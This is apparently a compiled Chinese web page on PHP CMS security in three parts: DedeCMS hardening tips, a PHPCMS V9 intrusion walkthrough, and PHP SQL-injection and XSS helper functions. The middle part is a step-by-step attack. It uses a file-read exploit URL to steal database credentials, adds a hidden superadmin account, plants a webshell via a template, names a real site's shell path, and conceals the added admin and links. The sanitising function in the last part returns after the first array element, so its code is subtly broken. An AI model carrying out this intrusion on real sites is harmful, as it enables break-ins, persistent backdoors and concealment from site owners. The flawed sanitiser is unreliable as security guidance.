php環境cmsxss漏洞,php防止xss

本文目錄一覽：

• 1、織夢cms漏洞的漏洞多嗎？要怎麼檢查有沒有漏洞呢？要是出現漏洞的話，怎麼辦呢？
• 2、服務器裝什麼軟件 phpcms注入漏洞
• 3、php防止sql注入以及xss跨站腳本攻擊

織夢cms漏洞的漏洞多嗎？要怎麼檢查有沒有漏洞呢？要是出現漏洞的話，怎麼辦呢？

對於用戶越多的CMS，研究的人就越多，發現的漏洞越多！下面就簡單的提供幾個織夢cms的漏洞常用解決方法：

1.第一步就是在dedecms的後台更新補丁,儘可能升級為最新版本。

2.data、templets、uploads、install這幾個目錄去掉寫的權限 。

3.用dedecms後台的“系統”中的文件校驗和病毒掃描功能 查殺病毒木馬。

4.如果只是使用文章系統並沒有使用會員功能,則強推推薦:關閉會員功能、關閉新會員註冊、直接刪除member目錄或改名。

5.重點查看/plus/config_s.php 此為dedecms裡面的流量攻擊腳本。

6.檢查有無/data/cache/t.php 、/data/cache/x.php和/plus/index.php 這些木馬文件,有的話則應立即刪除。

服務器裝什麼軟件 phpcms注入漏洞

本文利用了PHPCMS V9的兩個漏洞，一個是讀取任意文件漏洞，另一個是模版運行php腳本漏洞。使用到的工具：Navicat for Mysql/IE瀏覽器(建議使用代理)/湛藍v9代碼包（包含文中使用到的所有文件、代碼和木馬）

1、放置data.txt以備在目標站點讀取並在目標站點生成PHP木馬腳本使用。

例如將data.txt放置在yun.baidu.com/j0192/data.txt

2、通過v9漏洞獲取配置信息（請參閱：phpcms V9最新讀取站點任意文件漏洞）。

/index.php?m=searchc=indexa=public_get_suggest_keywordurl=asdfq=../../phpsso_server/caches/configs/database.php

3、通過v9系統漏洞獲取到的數據庫信息遠程登陸目標站點數據庫，在v9_admin和v9_sso_admin表中添加賬號

username字段：admn

password字段：10203d4623c1957d041818196ff9822a

encrypt 字段：bGV22e

issuper 字段: 1

4、通過數據庫添加管理員賬號後使用以下用戶名密碼在後台登陸，然後修改當前用戶密碼。

用戶名：admn

密碼：123456

5、ctrl+a複製write.php全部內容粘貼進v9默認模版下的footer.html保存，然後點擊footer.html的可視化運行該模版中的腳本，到此時就完成在目標站點生成木馬腳本。

6、打開ifeng.com/caches/caches_template/default/wap/data.class.php

用戶名：admin

密碼：admin

7、隱藏新增加的管理員。

通過木馬腳本上傳替換/phpcms/modules/admin/admin_manage.php(默認匹配%admn%)，然後登陸目標站點後台查看管理員列表是否還有用戶名為admn的超級管理員，如果沒有則表明我們完成了新加管理員的隱藏。

8、隱藏新增加的關聯鏈接

通過木馬腳本上傳替換/phpcms/modules/admin/keylink.php((默認匹配%skyhome%))

9、將目標網站的漏洞修復，以防其他黑客入侵。

通過木馬腳本上傳替換/phpcms/modules/search/index.php

防黑參考:

1、關閉數據庫遠程訪問。

2、靜態文件及附件等文件目錄禁止執行權限。

3、腳本文件目錄禁止寫權限。

4、系統後台等重要目錄限制IP訪問。

5、及時關注開源系統官方補丁升級和烏雲、sebug等漏洞發布平台，修復系統漏洞。

php防止sql注入以及xss跨站腳本攻擊

1.post數據

封裝轉義函數 防sql注入  eag：addslashes($username);addslashes($password); 

eag:防止sql注入函數封裝 

function deepslashes($data){

#判斷$data的表現形式 並且需要處理空的情況

if(empty($data)){

return($data);

}

#高級簡寫 return is_array($data) ? array_map(‘deepslashes’,$data) : addslashes($data);

#初級寫法

if(is_array($data)){

#遞歸循環遍歷處理多維數組

foreach ($data as $v) {

return deepslashes($v);

}

}else{

#單一變量

return addslashes($data);

}

#初級寫法

}

2.get數據

指url 傳參數導致sql發生改變

解決方案

①強制轉換，使用函數intval 或者 數據類型 的關鍵字int

②隱式轉換，通過運算，只需要+0即可

3.xss跨站腳本攻擊

指惡意攻擊向web頁面插入html、js標籤導致頁面出現錯誤

解決方案

轉義標籤” ”即可，有以下php函數可解決

htmlspecialchars 函數 和 htmlentites函數

eag:

function deepslashes($data){

#判斷$data的表現形式 並且需要處理空的情況

if(empty($data)){

return($data);

}

return is_array($data) ? array_map(‘deepslashes’,$data) : htmlspecialchars ($data);

}